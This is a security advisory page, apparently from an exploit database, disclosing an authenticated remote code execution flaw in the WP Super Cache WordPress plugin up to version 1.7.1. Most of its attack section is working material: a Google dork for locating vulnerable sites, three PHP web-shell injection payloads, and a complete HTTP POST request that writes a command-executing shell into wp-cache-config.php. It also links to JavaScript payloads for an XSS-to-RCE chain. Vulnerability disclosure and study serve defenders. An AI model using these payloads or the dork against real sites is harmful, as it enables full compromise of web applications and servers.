WP Super Cache WordPress Plugin <= 1.7.1 - Authenticated RCE / XSS -> RCE

2021.03.19
ru m0ze (RU) ru
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-94

/*! - # VULNERABILITY: WP Super Cache WordPress Plugin <= 1.7.1 - Authenticated RCE / XSS -> RCE - # GOOGLE DORK: inurl:/wp-content/plugins/wp-super-cache/ - # DATE: 2021-03-13 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ] - # VENDOR: Automattic [ https://automattic.com ] - # SOFTWARE VERSION: <= 1.7.1 - # SOFTWARE LINK: https://wordpress.org/plugins/wp-super-cache/ - # CVSS: AV:N/AC:L/PR:L/UI:R/S:C - # CWE: CWE-94 - # CVE: N/A */ ### -- [ Info: ] [i] An Authenticated RCE vulnerability was discovered in the WP Super Cache plugin through 1.7.1 for WordPress. [i] RCE due to input validation failure and weak $cache_path check in the WP Super Cache Settings -> Cache Location option. Direct access to the wp-cache-config.php file is not prohibited, so this vulnerability can be exploited for a web shell injection. [i] Another possible attack scenario: from XSS to RCE. ### -- [ Impact: ] [~] Full compromise of the vulnerable web application and also web server. ### -- [ Payloads: ] [$] ';system($_GET[13]);include_once \'wp-cache-config.php\';' [$] ';`$_GET[13]`;include_once \'wp-cache-config.php\';?><!-- [$] ';`$_GET[13]`;# ### -- [ PoC #1 | Authenticated RCE | Cache Location: ] [!] POST /wp-admin/options-general.php?page=wpsupercache&tab=settings HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 501 Cookie: [cookies] _wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings&action=scupdates&wp_cache_enabled=1&wp_cache_mod_rewrite=0&wp_cache_not_logged_in=2&cache_rebuild_files=1&wp_cache_location=%2Fvar%2Fwww%2Fyour%2Fown%2Fpath%2Fexample.com%2Fwp-content%2Fcache%2F%27%3Bsystem%28%24_GET%5B13%5D%29%3Binclude_once+%5C%27wp-cache-config.php%5C%27%3B%27&_wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings ### -- [ PoC #2 | From XSS to RCE | Cache Location: ] [!] https://m0ze.ru/payload/wp-super-cache-rce.js [!] https://m0ze.ru/payload/wp-super-cache-rce-j.js ### -- [ Contacts: ] [+] Website: m0ze.ru [+] GitHub: @m0ze [+] Telegram: @m0ze_ru [+] Twitter: @vladm0ze

Referencje:

https://m0ze.ru/vulnerability/[2021-03-13]-[WordPress]-[CWE-94]-WP-Super-Cache-WordPress-Plugin-v1.7.1.txt
https://twitter.com/vladm0ze


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top